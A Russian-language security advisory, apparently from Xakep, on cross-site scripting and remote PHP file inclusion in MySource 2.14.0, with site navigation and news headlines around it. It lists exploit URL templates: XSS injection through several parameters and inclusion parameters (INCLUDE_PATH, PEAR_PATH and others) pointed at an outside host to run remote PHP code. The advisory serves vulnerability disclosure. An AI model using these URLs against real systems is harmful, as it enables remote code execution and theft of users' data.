Межсайтовый скриптинг и PHP-инклюдинг в MySource

Рекомендуем почитать:

Xakep #305. Многошаговые SQL-инъекции

Программа: MySource 2.14.0

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей и выполнить произвольный PHP сценарий на целевой системе.

1. Межсайтовый скриптинг возможет из-за недостаточной обработки входных данных перед отображением их в браузере пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

http://[victim]/web/edit/upgrade_in_progress_ backend.php?target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/ insert_table.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_cell_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ header.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_row_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/
edit_table_cell_type_wysiwyg.php?stylesheet=">[code]

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе.

Примеры:

http://[victim]/web/edit/upgrade_functions/new_upgrade
_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade
_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php? INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php? PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php? PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_ PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_ PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_ PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode. php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php? PEAR_PATH=http://[host]/[file]?

Для удачной эксплуатации уязвимостей должна быть включена опция register_globals

Межсайтовый скриптинг и PHP-инклюдинг в MySource

Xakep #305. Многошаговые SQL-инъекции

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Алексей Миртов о рынке анти-DDoS и облачной защите «Яндекса»

Кеш из топора. Как производители SSD обманывают тесты и покупателей

NUTS. Расследуем атаку на пакетный менеджер NuGet

Самооборона по-хакерски. Выявляем атаки в Active Directory

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Midnight Blizzard использует RDP-прокси для MiTM-атак и кражи данных

Android-ботнет Badbox уже насчитывает более 192 000 устройств

Оператор стилера Raccoon приговорен к пяти годам тюрьмы

В магазине приложений Amazon Appstore нашли шпионское приложение для Android

Lazarus атакует атомную промышленность новой малварью